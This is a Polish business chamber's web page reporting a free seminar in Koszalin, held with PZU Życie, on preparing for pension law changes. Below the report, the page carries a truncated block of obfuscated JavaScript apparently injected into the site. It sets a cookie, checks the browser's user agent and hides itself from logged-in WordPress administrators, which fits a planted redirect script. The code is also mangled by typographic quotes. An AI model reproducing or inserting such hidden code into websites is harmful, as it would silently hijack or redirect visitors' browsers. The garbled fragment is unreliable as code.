Jak przygotować się do zmian w przepisach emerytalnych? – relacja ze spotkania | Północna Izba Gospodarcza w Koszalinie

11 października w Restauracji Park Caffe w Koszalinie odbyło się spotkanie informacyjne dla przedsiębiorców pt. „Jak przygotować się do zmian w przepisach emerytalnych?”.

Bezpłatne szkolenie zostało zorganizowane przy współpracy Północnej Izby Gospodarczej
w Koszalinie z przedstawicielami PZU Życie S.A. Na spotkanie przybyli właściciele
i kierownicy kadrowi największych firm w regionie Koszalińskim a nawet delegaci firm
z Wałcza.

Szkolenie przeprowadził Tomasz Fronczak – Dyrektor Biura Programów Emerytalno-Oszczędnościowych, od 16 lat związany z Grupą PZU.

Podczas spotkania przedsiębiorcy dowiedzieli się m.in. jaka jest obecna sytuacja na rynku emerytalnym, na czym będą polegać Pracownicze Programy Kapitałowe, jakie obowiązki finansowe będą spoczywać na pracodawcy, oraz czy Pracownicze Programy Emerytalne są lepszym rozwiązaniem, niż planowane zmiany.

Bardzo dziękujemy za tak liczne przybycie i zapraszamy na kolejne szkolenia tej jesieni!

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m